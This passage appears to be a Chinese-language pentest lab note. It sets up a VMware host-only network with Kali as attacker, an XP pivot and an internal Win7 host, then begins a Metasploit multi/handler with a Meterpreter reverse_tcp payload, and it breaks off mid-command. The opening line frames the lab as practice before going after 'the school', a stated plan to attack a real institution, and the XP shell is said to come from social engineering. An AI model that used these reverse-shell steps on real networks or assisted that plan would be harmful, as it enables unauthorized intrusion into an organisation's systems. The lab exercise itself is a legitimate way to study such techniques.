msfconsole
先模拟多层内网,摸清后渗透的使用,再从学校入手。 内网渗透test 网络拓扑 以kali为攻击机,xp作为跳板主机,win7是内网主机 xp主机是提供web,FTP等服务,已被kali机获取shell win7正常不与外网访问,和DMZ区域处于同一网段 环境搭建 使用VMware的主机模式,构建虚拟局域网。 查看 Host-only模式详解 虚拟网络编译器中添加两块网卡vm1,vm2。 类型 :主机模式 设置xp为双网卡vm1,vm2。其余按网络拓扑分配网卡 查看ip kali xp win7 至此环境布置完毕 拿下跳板以及端口转发 以社工等方法获取到xp主机的shell 通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机 #kali msf msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.252.128 lhost => 192.168.252.128 msf5 exploit(multi